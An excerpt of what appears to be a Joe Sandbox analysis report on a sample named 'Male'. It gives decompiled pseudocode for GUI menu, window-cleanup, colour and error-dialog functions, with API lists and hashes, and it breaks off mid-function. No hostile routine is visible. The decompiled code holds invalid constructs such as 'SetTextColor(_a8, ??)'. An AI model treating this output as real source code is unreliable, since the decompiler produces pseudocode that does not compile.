								SetMenuItemInfoW(_a12, _t100, _t117,  &_v72);
							}
							L41:
							E0141C47C(_t116, __eflags, _t100);
							L3:
							return 1;
						}
						__eflags = _t105[1];
						if(_t105[1] == 0) {
							goto L36;
						}
						_t80 = GetMenuItemCount(_t72);
						__eflags = _t116[1];
						_a16 = _t80;
						if(_t116[1] != 0) {
							_t80 = _t80 - 4;
							__eflags = _t80;
							_a16 = _t80;
						}
						__eflags = _t80;
						if(_t80 <= 0) {
							_t81 = _t80 | 0xffffffff;
							__eflags = _t81;
							goto L22;
						} else {
							while(1) {
								_t81 = GetMenuItemID(_a12, _t117);
								__eflags = _t81 - _t100;
								if(_t81 == _t100) {
									break;
								}
								_t117 = _t117 + 1;
								__eflags = _t117 - _a16;
								if(_t117 < _a16) {
									continue;
								}
								L22:
								__eflags = _t81 - _t100;
								if(__eflags != 0) {
									goto L41;
								}
								break;
							}
							_t82 = _t117;
							_t118 = _t117 - 1;
							__eflags = _t118;
							_v12 = _t82;
							if(_t118 < 0) {
								L29:
								_t37 = _t118 + 1; // -1
								_t108 = _t37;
								_t38 = _t82 + 1; // 0x1
								_t119 = _t38;
								_v24 = _t108;
								__eflags = _t119 - _a16;
								if(__eflags >= 0) {
									L35:
									CheckMenuRadioItem(_a12, _t108, _t119 - 1, _t82, 0x400);
									goto L41;
								}
								_t101 = _a12;
								do {
									_v16 = GetMenuItemID(_t101, _t119);
									_t86 = E0141CCEE(_t116, _t85,  &_v20);
									__eflags = _t86;
									if(_t86 == 0) {
										goto L33;
									}
									_t46 = _v16 * 4; // 0x0
									__eflags =  *((char*)( *((intOrPtr*)(_t116 + _t46 + 0x1b4)) + 5));
									if(__eflags == 0) {
										break;
									}
									L33:
									_t119 = _t119 + 1;
									__eflags = _t119 - _a16;
								} while (__eflags < 0);
								_t100 = _v8;
								_t82 = _v12;
								_t108 = _v24;
								goto L35;
							}
							_t102 = _a12;
							do {
								_v16 = GetMenuItemID(_t102, _t118);
								_t90 = E0141CCEE(_t116, _t89,  &_v20);
								__eflags = _t90;
								if(_t90 == 0) {
									goto L27;
								}
								_t32 = _v16 * 4; // 0x0
								_t92 =  *((intOrPtr*)(_t116 + _t32 + 0x1b4));
								__eflags =  *((char*)(_t92 + 5));
								if( *((char*)(_t92 + 5)) == 0) {
									break;
								}
								L27:
								_t118 = _t118 - 1;
								__eflags = _t118;
							} while (_t118 >= 0);
							_t100 = _v8;
							_t82 = _v12;
							goto L29;
						}
					}
					_t94 = GetMenuItemInfoW( *_t116, _t100, 0,  &_v72);
					__eflags = _t94;
					if(_t94 == 0) {
						goto L42;
					}
					_t95 = _v72.fState;
					_t114 = _t95 & 0x00000008;
					__eflags = _t114;
					if(_t114 == 0) {
						_t96 = _t95 | 0x00000008;
						__eflags = _t96;
					} else {
						_t96 = _t95 ^ 0x00000008;
					}
					_v72.fState = _t96;
					__eflags = _t114;
					 *0x1482357 = _t114 == 0;
					SetMenuItemInfoW( *_t116, 4, _t117,  &_v72);
					E013B4C04(_t116, _t125);
					Sleep(0x1f4);
					goto L3;
				}
				 *0x1482340 = 2;
				 *0x1482352 = 1;
				goto L3;
			}

0x0141c7a2
0x0141c7ad
0x0141c7af
0x0141c7b9
0x0141c7bd
0x0141c7c2
0x0141c7cc
0x0141c7e4
0x0141c9ca
0x0141c9ca
0x00000000
0x0141c9ca
0x0141c7ea
0x0141c7ed
0x0141c7ed
0x0141c7f7
0x0141c811
0x0141c814
0x0141c870
0x0141c873
0x0141c876
0x00000000
0x00000000
0x0141c87c
0x0141c87f
0x00000000
0x00000000
0x0141c885
0x0141c88b
0x00000000
0x00000000
0x0141c891
0x0141c895
0x0141c897
0x0141c89a
0x0141c989
0x0141c989
0x0141c98d
0x0141c996
0x0141c99c
0x0141c99f
0x0141c9a1
0x0141c9a8
0x0141c9a8
0x0141c9a3
0x0141c9a3
0x0141c9a3
0x0141c9ab
0x0141c9b7
0x0141c9b7
0x0141c9bd
0x0141c9c0
0x0141c80a
0x00000000
0x0141c80a
0x0141c8a0
0x0141c8a4
0x00000000
0x00000000
0x0141c8ab
0x0141c8b1
0x0141c8b5
0x0141c8b8
0x0141c8ba
0x0141c8ba
0x0141c8bd
0x0141c8bd
0x0141c8c0
0x0141c8c2
0x0141c8da
0x0141c8da
0x00000000
0x0141c8c4
0x0141c8c4
0x0141c8c8
0x0141c8ce
0x0141c8d0
0x00000000
0x00000000
0x0141c8d2
0x0141c8d3
0x0141c8d6
0x00000000
0x00000000
0x0141c8dd
0x0141c8dd
0x0141c8df
0x00000000
0x00000000
0x00000000
0x0141c8df
0x0141c8e5
0x0141c8e7
0x0141c8e7
0x0141c8ea
0x0141c8ed
0x0141c928
0x0141c928
0x0141c928
0x0141c92b
0x0141c92b
0x0141c92e
0x0141c931
0x0141c934
0x0141c973
0x0141c981
0x00000000
0x0141c981
0x0141c936
0x0141c939
0x0141c944
0x0141c94b
0x0141c950
0x0141c952
0x00000000
0x00000000
0x0141c957
0x0141c95e
0x0141c962
0x00000000
0x00000000
0x0141c964
0x0141c964
0x0141c965
0x0141c965
0x0141c96a
0x0141c96d
0x0141c970
0x00000000
0x0141c970
0x0141c8ef
0x0141c8f2
0x0141c8fd
0x0141c904
0x0141c909
0x0141c90b
0x00000000
0x00000000
0x0141c910
0x0141c910
0x0141c917
0x0141c91b
0x00000000
0x00000000
0x0141c91d
0x0141c91d
0x0141c91d
0x0141c91d
0x0141c922
0x0141c925
0x00000000
0x0141c925
0x0141c8c2
0x0141c81e
0x0141c824
0x0141c826
0x00000000
0x00000000
0x0141c82c
0x0141c831
0x0141c831
0x0141c834
0x0141c83b
0x0141c83b
0x0141c836
0x0141c836
0x0141c836
0x0141c83e
0x0141c841
0x0141c84c
0x0141c853
0x0141c85b
0x0141c865
0x00000000
0x0141c865
0x0141c7f9
0x0141c803
0x00000000

APIs

GetMenuItemInfoW.USER32 ref: 0141C81E
SetMenuItemInfoW.USER32 ref: 0141C853
Sleep.KERNEL32(000001F4), ref: 0141C865
GetMenuItemCount.USER32 ref: 0141C8AB
GetMenuItemID.USER32(?,00000000), ref: 0141C8C8
GetMenuItemID.USER32(?,-00000001), ref: 0141C8F4
GetMenuItemID.USER32(?,?), ref: 0141C93B
CheckMenuRadioItem.USER32 ref: 0141C981
GetMenuItemInfoW.USER32 ref: 0141C996
SetMenuItemInfoW.USER32 ref: 0141C9B7

Strings

0, xrefs: 0141C7AF

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 961963e36dc5b98c7752aacd88b996b13315a08cf92e510d2e74858e51e62898
Instruction ID: 66ceb359cb87abeeba2dc87c57ef16d43670d614c46f1bfbe16cf62fe1dbdad4
Opcode Fuzzy Hash: 961963e36dc5b98c7752aacd88b996b13315a08cf92e510d2e74858e51e62898
Instruction Fuzzy Hash: FF6191B1950246ABDF21CFA8DDC8AFF7FB9FB05314F04401AE942A32A5DB349901CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013B16B2, Relevance: 18.2, APIs: 12, Instructions: 168
timeCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E013B16B2(void* __ecx, void* __edi, void* __esi, int _a4) {
				signed int _v8;
				intOrPtr _t60;
				int _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t75;
				void* _t83;
				void* _t84;
				void* _t87;
				intOrPtr _t93;
				signed int _t95;
				signed int _t97;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t101;
				intOrPtr _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				struct HWND__** _t109;
				void* _t128;

				_push(__ecx);
				_t60 =  *0x1482930; // 0x0
				_t105 = _a4;
				_t101 =  *((intOrPtr*)( *((intOrPtr*)(_t60 + _t105 * 4))));
				E013B670F(_t101, 0);
				if( *(_t101 + 0x18) != 0) {
					DestroyAcceleratorTable( *(_t101 + 0x18));
					 *(_t101 + 0x18) =  *(_t101 + 0x18) & 0x00000000;
				}
				_t93 =  *0x1482954; // 0x2
				_t97 = 3;
				_v8 = _t97;
				if(_t93 < _t97) {
					L18:
					if( *(_t101 + 0x20) != 0) {
						DestroyIcon( *(_t101 + 0x20));
					}
					if( *(_t101 + 0x24) != 0) {
						DestroyIcon( *(_t101 + 0x24));
					}
					_t98 =  *0x1482930; // 0x0
					_t94 =  *( *(_t98 + _t105 * 4));
					if( *( *(_t98 + _t105 * 4)) != 0) {
						E013B1859(_t94, _t94);
						_t98 =  *0x1482930; // 0x0
					}
					 *( *(_t98 + _t105 * 4)) =  *( *(_t98 + _t105 * 4)) & 0x00000000;
					_t106 =  *0x14828f0; // 0x0
					_t68 = _a4;
					_t107 = _t106 - 1;
					 *0x14828f0 = _t107;
					_t128 = _t68 -  *0x148293c; // 0xffffffff
					if(_t128 == 0) {
						 *0x148293c =  *0x148293c | 0xffffffff;
					}
					_t95 =  *0x1482934; // 0x0
					if(_t107 == 1) {
						_t99 = 0;
						if(_t95 <= 0) {
							L51:
							 *0x148293c = _t99;
							goto L25;
						}
						_t103 =  *0x1482930; // 0x0
						while(1) {
							_t68 =  *(_t103 + _t99 * 4);
							if( *_t68 != 0) {
								goto L51;
							}
							_t99 = _t99 + 1;
							if(_t99 < _t95) {
								continue;
							}
							goto L51;
						}
						goto L51;
					} else {
						L25:
						if(_t107 != 0) {
							L28:
							if(_t95 == 0) {
								L31:
								return _t68;
							}
							_t69 =  *0x1482930; // 0x0
							_t68 =  *(_t69 + _t95 * 4 - 4);
							if( *_t68 != 0) {
								goto L31;
							}
							_t68 = E013B1835(0x148292c);
							L27:
							_t95 =  *0x1482934; // 0x0
							goto L28;
						}
						_t68 = KillTimer(0,  *0x14828f4);
						 *0x14828f4 =  *0x14828f4 & 0x00000000;
						goto L27;
					}
				} else {
					do {
						_t71 =  *0x1482944; // 0x19b5930
						_t109 =  *( *(_t71 + _t97 * 4));
						if(_t109 != 0 && _t109[1] ==  *((intOrPtr*)(_t101 + 4))) {
							_t75 = (_t109[0x24] & 0x000000ff) - 0xa;
							if(_t75 == 0) {
								L39:
								if(_t109[0x10] != 0) {
									ImageList_Destroy(_t109[0x10]);
									_t109[0x10] = _t109[0x10] & 0x00000000;
								}
								L9:
								if(_t109[0x19] != 0) {
									DeleteObject(_t109[0x19]);
									_t109[0x19] = _t109[0x19] & 0x00000000;
								}
								if(_t109[0x1a] != 0) {
									DestroyIcon(_t109[0x1a]);
									_t109[0x1a] = _t109[0x1a] & 0x00000000;
								}
								if(_t109[0x11] != 0) {
									DeleteObject(_t109[0x11]);
									_t109[0x11] = _t109[0x11] & 0x00000000;
								}
								if(_t109[0x14] != 0) {
									DestroyWindow(_t109[0x14]);
									_t109[0x14] = _t109[0x14] & 0x00000000;
								}
								if( *_t109 != 0) {
									DestroyWindow( *_t109);
									 *_t109 =  *_t109 & 0x00000000;
								}
								E013B6F1C(_t109, _v8);
								_t93 =  *0x1482954; // 0x2
								_t97 = _v8;
								goto L16;
							}
							_t83 = _t75 - 6;
							if(_t83 == 0) {
								goto L39;
							} else {
								_t84 = _t83 - 3;
								if(_t84 == 0) {
									if(_t109[0xe] != 0) {
										ImageList_Destroy(_t109[0xe]);
										_t109[0xe] = _t109[0xe] & 0x00000000;
									}
									if(_t109[0xf] != 0) {
										ImageList_Destroy(_t109[0xf]);
										_t109[0xf] = _t109[0xf] & 0x00000000;
									}
								} else {
									_t87 = _t84 - 8;
									if(_t87 != 0) {
										if(_t87 == 0) {
											E01447545(_t109, _t101);
										}
									} else {
										E013B670F(_t101, _t109);
									}
								}
								goto L9;
							}
						}
						L16:
						_t97 = _t97 + 1;
						_v8 = _t97;
					} while (_t97 <= _t93);
					_t105 = _a4;
					goto L18;
				}
			}

0x013b16b5
0x013b16b6
0x013b16bc
0x013b16c5
0x013b16c8
0x013b16d1
0x013f2bff
0x013f2c05
0x013f2c05
0x013b16d7
0x013b16df
0x013b16e0
0x013b16e5
0x013b178f
0x013b1793
0x013f2cba
0x013f2cba
0x013b179d
0x013f2cc8
0x013f2cc8
0x013b17a3
0x013b17ac
0x013b17b0
0x013b17b3
0x013b17b8
0x013b17b8
0x013b17c1
0x013b17c4
0x013b17ca
0x013b17cd
0x013b17ce
0x013b17d4
0x013b17da
0x013b17dc
0x013b17dc
0x013b17e3
0x013b17ec
0x013f2cd3
0x013f2cd7
0x013f2cec
0x013f2cec
0x00000000
0x013f2cec
0x013f2cd9
0x013f2cdf
0x013f2cdf
0x013f2ce5
0x00000000
0x00000000
0x013f2ce7
0x013f2cea
0x00000000
0x00000000
0x00000000
0x013f2cea
0x00000000
0x013b17f2
0x013b17f2
0x013b17f6
0x013b1813
0x013b1815
0x013b1832
0x013b1832
0x013b1832
0x013b1817
0x013b181c
0x013b1823
0x00000000
0x00000000
0x013b182a
0x013b180d
0x013b180d
0x00000000
0x013b180d
0x013b1800
0x013b1806
0x00000000
0x013b1806
0x013b16eb
0x013b16eb
0x013b16eb
0x013b16f3
0x013b16f7
0x013b170c
0x013b170f
0x013f2c53
0x013f2c57
0x013f2c60
0x013f2c66
0x013f2c66
0x013b1737
0x013b173b
0x013f2c72
0x013f2c78
0x013f2c78
0x013b1745
0x013f2c84
0x013f2c8a
0x013f2c8a
0x013b174f
0x013f2c96
0x013f2c9c
0x013f2c9c
0x013b1759
0x013f2ca8
0x013f2cae
0x013f2cae
0x013b1762
0x013b1766
0x013b176c
0x013b176c
0x013b1772
0x013b1777
0x013b177d
0x00000000
0x013b177d
0x013b1715
0x013b1718
0x00000000
0x013b171e
0x013b171e
0x013b1721
0x013f2c28
0x013f2c2d
0x013f2c33
0x013f2c33
0x013f2c3b
0x013f2c44
0x013f2c4a
0x013f2c4a
0x013b1727
0x013b1727
0x013b172a
0x013f2c12
0x013f2c1a
0x013f2c1a
0x013b1730
0x013b1732
0x013b1732
0x013b172a
0x00000000
0x013b1721
0x013b1718
0x013b1780
0x013b1780
0x013b1781
0x013b1784
0x013b178c
0x00000000
0x013b178c

APIs

Part of subcall function 013B670F: InvalidateRect.USER32(?,00000000,00000001,?,?,?,013B16CD,?,00000000,?,?,?,?,013B169F,00000000,?), ref: 013B6772

DestroyWindow.USER32(?), ref: 013B1766
KillTimer.USER32(00000000,?,?,?,?,013B169F,00000000,?), ref: 013B1800
DestroyAcceleratorTable.USER32 ref: 013F2BFF
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,013B169F,00000000,?), ref: 013F2C2D
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,013B169F,00000000,?), ref: 013F2C44
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,013B169F,00000000), ref: 013F2C60
DeleteObject.GDI32(00000000), ref: 013F2C72

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 8096748f57c49e27a31e677b89c8a021cde2a3216651d4635317d80085928702
Instruction ID: e36632e2731367e2fac2d3baf8d2ed5a2c1d2d2470cece84e7449f4997e88bbb
Opcode Fuzzy Hash: 8096748f57c49e27a31e677b89c8a021cde2a3216651d4635317d80085928702
Instruction Fuzzy Hash: 17619A30601A05DFDB369F58E999B6A7BB1FB4035AF00411CE6429B978D7B4E891CF80

Uniqueness

Uniqueness Score: -1.00%

Function 013B2078, Relevance: 18.1, APIs: 12, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E013B2078(signed int _a4, char _a7, struct HDC__* _a8, struct HDC__* _a12) {
				int _v8;
				int _v20;
				void* _v24;
				intOrPtr _t47;
				intOrPtr _t54;
				signed int _t56;
				signed char _t62;
				int _t78;
				signed char* _t79;
				void* _t80;
				struct HDC__* _t81;
				long _t83;
				long _t84;
				signed int _t85;
				struct HWND__** _t86;

				_t47 =  *0x1482930; // 0x0
				_t78 =  *((intOrPtr*)( *((intOrPtr*)(_t47 + _a4 * 4))));
				_v8 = _t78;
				_t85 = E013B2184(_a12);
				_a7 = 0;
				_t84 = GetSysColor(0xf);
				if( *(_t78 + 0x4c) != 0xffffffff) {
					_t84 =  *(_t78 + 0x4c);
				}
				if(_t85 == 0xffffffff) {
					L43:
					SetBkColor(_a8, _t84);
					return E013B1F40(_t84, 0);
				}
				_t54 =  *0x1482944; // 0x19b5930
				_t86 =  *( *(_t54 + _t85 * 4));
				_a12 = _t86;
				_t83 = _t86[0x12];
				_t13 =  &(_t86[0x24]); // 0x90
				_t79 = _t13;
				if(_t83 >= 0) {
					if( *_t79 == 0x1b) {
						goto L4;
					}
					_t84 = _t83;
					L7:
					if(_t86[0x24] != 0xff) {
						if(_t86[0x12] != 0xffffffff) {
							goto L8;
						}
						_t62 =  *_t79;
						if(_t62 != 0x17) {
							if(_t62 == 7 || _t62 == 1 || _t62 == 2 || _t62 == 3 || _t62 == 0) {
								goto L8;
							} else {
								_t81 = GetWindowDC( *_t86);
								_t84 = GetPixel(_t81, 0, 0);
								if(_t84 == 0xffffffff) {
									_t84 = GetPixel(_t81, _t86[0x23] - 1, 0);
									if(_t84 == 0xffffffff) {
										_t84 = GetPixel(_t81, 0, _t86[0x23] - 1);
										if(_t84 == 0xffffffff) {
											_t84 = GetPixel(_t81, _t86[0x23] - 1, _t86[0x23] - 1);
										}
									}
								}
								ReleaseDC( *_t86, _t81);
								_t80 = 1;
								if(_t84 == 0xffffffff) {
									L9:
									if(_t86[0x13] != 0xffffffff) {
										_push(_t86[0x13]);
									} else {
										_push(GetSysColor(8));
									}
									SetTextColor(_a8, ??);
									if(_t80 == 0) {
										goto L43;
									} else {
										SetBkMode(_a8, 1);
										return GetStockObject(5);
									}
								} else {
									goto L8;
								}
							}
						}
						_t80 = 1;
						goto L9;
					}
					L8:
					_t80 = _a7;
					goto L9;
				}
				L4:
				_t56 =  *_t79 & 0x000000ff;
				if(_t56 > 0x1b) {
					L28:
					_a7 = _t56 & 0xffffff00 | _t83 == 0xfffffffe;
					goto L7;
				}
				switch( *((intOrPtr*)(( *(_t56 + 0x13b2168) & 0x000000ff) * 4 +  &M013B214C))) {
					case 0:
						if((GetWindowLongW( *__esi, 0xfffffff0) & 0x08000800) == 0) {
							goto L26;
						}
						_push(0xf);
						goto L27;
					case 1:
						L26:
						_push(5);
						L27:
						__edi = GetSysColor();
						goto L7;
					case 2:
						goto L28;
					case 3:
						_a7 = 1;
						goto L7;
					case 4:
						if( *((char*)(__esi + 0x93)) == 0xff) {
							goto L8;
						}
						__esi = _v8;
						 &_v24 = GetClientRect( *(__esi + 0x188),  &_v24);
						 &_v24 = SendMessageW( *(__esi + 0x188), 0x1328, 0,  &_v24);
						__esi = GetWindowDC( *(__esi + 0x188));
						__edi = GetPixel(__esi, _v24, _v20);
						_v8 = ReleaseDC( *(_v8 + 0x188), __esi);
						if(__edi == 0xffffffff) {
							if( *0x1482380 != 0) {
								_push(5);
							} else {
								_push(0xf);
							}
							__edi = GetSysColor();
						}
						__esi = _a12;
						goto L7;
					case 5:
						goto L7;
				}
			}

0x013b2081
0x013b208f
0x013b2091
0x013b2099
0x013b209f
0x013b20ac
0x013b20ae
0x013b20b0
0x013b20b0
0x013b20b6
0x013f3238
0x013f323c
0x00000000
0x013f3245
0x013b20bc
0x013b20c4
0x013b20c6
0x013b20c9
0x013b20cc
0x013b20cc
0x013b20d4
0x013b2141
0x00000000
0x00000000
0x013b2143
0x013b20f4
0x013b20fb
0x013f317b
0x00000000
0x00000000
0x013f3181
0x013f3185
0x013f3190
0x00000000
0x013f31b6
0x013f31c0
0x013f31cb
0x013f31d0
0x013f31e4
0x013f31e9
0x013f31fd
0x013f3202
0x013f321d
0x013f321d
0x013f3202
0x013f31e9
0x013f3222
0x013f3228
0x013f322d
0x013b2104
0x013b2108
0x013b2147
0x013b210a
0x013b2112
0x013b2112
0x013b2116
0x013b211e
0x00000000
0x013b2124
0x013b2129
0x00000000
0x013b2131
0x013f3233
0x00000000
0x013f3233
0x013f322d
0x013f3190
0x013f3187
0x00000000
0x013f3187
0x013b2101
0x013b2101
0x00000000
0x013b2101
0x013b20d6
0x013b20d6
0x013b20dc
0x013f3169
0x013f316f
0x00000000
0x013f316f
0x013b20e9
0x00000000
0x013f3154
0x00000000
0x00000000
0x013f3156
0x00000000
0x00000000
0x013f315a
0x013f315a
0x013f315c
0x013f3162
0x00000000
0x00000000
0x00000000
0x00000000
0x013b20f0
0x00000000
0x00000000
0x013f30c4
0x00000000
0x00000000
0x013f30ca
0x013f30d7
0x013f30ee
0x013f3103
0x013f310f
0x013f311b
0x013f3124
0x013f312d
0x013f3133
0x013f312f
0x013f312f
0x013f312f
0x013f313b
0x013f313b
0x013f313d
0x00000000
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 013B2184: GetWindowLongW.USER32(?,000000EB), ref: 013B2192

GetSysColor.USER32(0000000F), ref: 013B20A2

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: da302089416638e1c1908f2264c4bdc8a0017e8d7e6b27d04ce96c86c97efc8f
Instruction ID: 535ed4415bdd61f3b2bc5087437122dd8798daf1050b7cf61c52ae654e99a900
Opcode Fuzzy Hash: da302089416638e1c1908f2264c4bdc8a0017e8d7e6b27d04ce96c86c97efc8f
Instruction Fuzzy Hash: 1F41B339600644AFDB315F7C9884BFB3B6AEB55329F144309EFA2875E5D731A841CB11

Uniqueness

Uniqueness Score: -1.00%

Function 01419EB9, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E01419EB9(void* __edx, void* __fp0, intOrPtr _a4, int _a8, intOrPtr _a12) {
				WCHAR* _v24;
				char _v40;
				char _v56;
				char _v72;
				WCHAR* _v88;
				short _v8280;
				void* _t41;
				void* _t54;
				void* _t57;
				intOrPtr _t82;
				intOrPtr _t84;
				void* _t104;
				void* _t108;
				void* _t121;

				_t121 = __fp0;
				_t104 = __edx;
				_t41 = 0x2058;
				E013F2370();
				_t82 = _a4;
				_t117 = _t82;
				if(_t82 > 0) {
					LoadStringW(GetModuleHandleW(0),  *0x1483410,  &_v8280, 0xfff);
					E013BC110( &_v88, _t117,  &_v8280);
					LoadStringW(GetModuleHandleW(0), _a8,  &_v8280, 0xfff);
					E013BC110( &_v72, _t117,  &_v8280);
					_a4 = E013BBE8E(_t82);
					_t108 = E0141A179(_t82);
					_t54 = E0141A1EF(_t82);
					E013B9091( &_v56, _t117);
					_t57 = E0141A223(_t54,  &_v56);
					_t118 = _t57;
					if(_t57 == 0) {
						E013CFEFB( &_v56, _t104,  &_v8280, L"Line %d:\n\n", _t108);
					} else {
						_push(_v56);
						E013CFEFB( &_v56, _t104,  &_v8280, L"Line %d  (File \"%s\"):\n\n", _t108);
					}
					E013BC110( &_v24, _t118,  &_v8280);
					_t84 = _a4;
					E013B4DCB( &_v24, _t121, _t84);
					E013B4DCB( &_v24, _t121, "\n");
					E013B9091( &_v40, _t118);
					if(_a12 >= 0) {
						E013B99C5(E013BB0DB( &_v40, _t84),  &_v40, _a12, 0xffffffff);
						E013B4DCB( &_v40, _t121, L"^ ERROR");
						E013B4D30( &_v24, _t121,  &_v40);
						E013B4DCB( &_v24, _t121, "\n");
					}
					E013B4DCB( &_v24, _t121, L"\nError: ");
					E013B4D30( &_v24, _t121,  &_v72);
					if( *0x14833b2 == 0) {
						MessageBoxW(0, _v24, _v88, 0x11010);
					} else {
						_push(_v40);
						_push(_t84);
						_push(_v72);
						_push(_t108);
						E0141A3F3(L"%s (%d) : ==> %s: \n%s \n%s\n", _v56);
					}
					E013B774C( &_v40);
					E013B774C( &_v24);
					E013B774C( &_v56);
					E013B774C( &_v72);
					_t41 = E013B774C( &_v88);
				}
				return _t41;
			}

0x01419eb9
0x01419eb9
0x01419ebc
0x01419ec1
0x01419ec7
0x01419ecc
0x01419ece
0x01419ef7
0x01419f03
0x01419f1c
0x01419f28
0x01419f34
0x01419f3d
0x01419f3f
0x01419f49
0x01419f53
0x01419f58
0x01419f60
0x01419f7d
0x01419f62
0x01419f62
0x01419f6c
0x01419f71
0x01419f8f
0x01419f94
0x01419f9b
0x01419fa9
0x01419fb1
0x01419fba
0x01419fcd
0x01419fda
0x01419fe6
0x01419fef
0x01419fef
0x01419ffc
0x0141a008
0x0141a014
0x0141a03d
0x0141a016
0x0141a016
0x0141a019
0x0141a01a
0x0141a01d
0x0141a026
0x0141a02b
0x0141a046
0x0141a04e
0x0141a056
0x0141a05e
0x0141a066
0x0141a066
0x0141a06f

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000001,?,013F691D,00000001,0000138C,00000001,00000001,00000001,?,0142EC97,01482420), ref: 01419EEE
LoadStringW.USER32(00000000,?,013F691D,00000001), ref: 01419EF7

Part of subcall function 013BC110: _wcslen.LIBCMT ref: 013BC11A

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,013F691D,00000001,0000138C,00000001,00000001,00000001,?,0142EC97,01482420,?), ref: 01419F19
LoadStringW.USER32(00000000,?,013F691D,00000001), ref: 01419F1C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0141A03D

Strings

Line %d:, xrefs: 01419F77
Line %d (File "%s"):, xrefs: 01419F66
^ ERROR, xrefs: 01419FD2
%s (%d) : ==> %s: %s %s, xrefs: 0141A021
Error: , xrefs: 01419FF4

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 17f07c15759ab6e70a025bc2d8fd61969fde9b27efd042a9fd42fd65d7683ce9
Instruction ID: 469ec77c6db21107246aac44bd11766e34a3d1f5df21f3dfbb765d1f03fe3c59
Opcode Fuzzy Hash: 17f07c15759ab6e70a025bc2d8fd61969fde9b27efd042a9fd42fd65d7683ce9
Instruction Fuzzy Hash: EE41947290011AAACB14FBE4DD95EEE777CEF64344F200129E205720A5EE346F48CB61

Uniqueness

Uniqueness Score: -1.00%

Function 014102A7, Relevance: 16.6, APIs: 11, Instructions: 122
memoryCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E014102A7(char _a4) {
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v48;
				void* __ebx;
				void* __ebp;
				char* _t54;
				intOrPtr _t56;
				signed int* _t58;
				void* _t63;
				intOrPtr _t72;
				signed int _t73;
				signed int _t74;
				intOrPtr _t79;
				signed int _t86;
				signed int _t87;
				intOrPtr* _t88;
				signed int _t93;
				intOrPtr _t94;

				_t88 = _a4;
				if( *((intOrPtr*)(_t88 + 0xc)) != 5) {
					L13:
					return 0;
				}
				_t72 =  *((intOrPtr*)( *((intOrPtr*)( *_t88)) + 0x10c));
				_t54 =  &_a4;
				__imp__#41(0xc, _t72, _t54);
				if(_t54 < 0) {
					goto L13;
				}
				_t87 = 0;
				_t74 = 0;
				if(_t72 <= 0) {
					L4:
					 *((short*)(_a4 + 2)) = 0x880;
					_t56 = _a4;
					 *((intOrPtr*)(_t56 + 4)) = 0x10;
					__imp__#37(_a4);
					if(_t56 < 0) {
						__imp__#38(_a4);
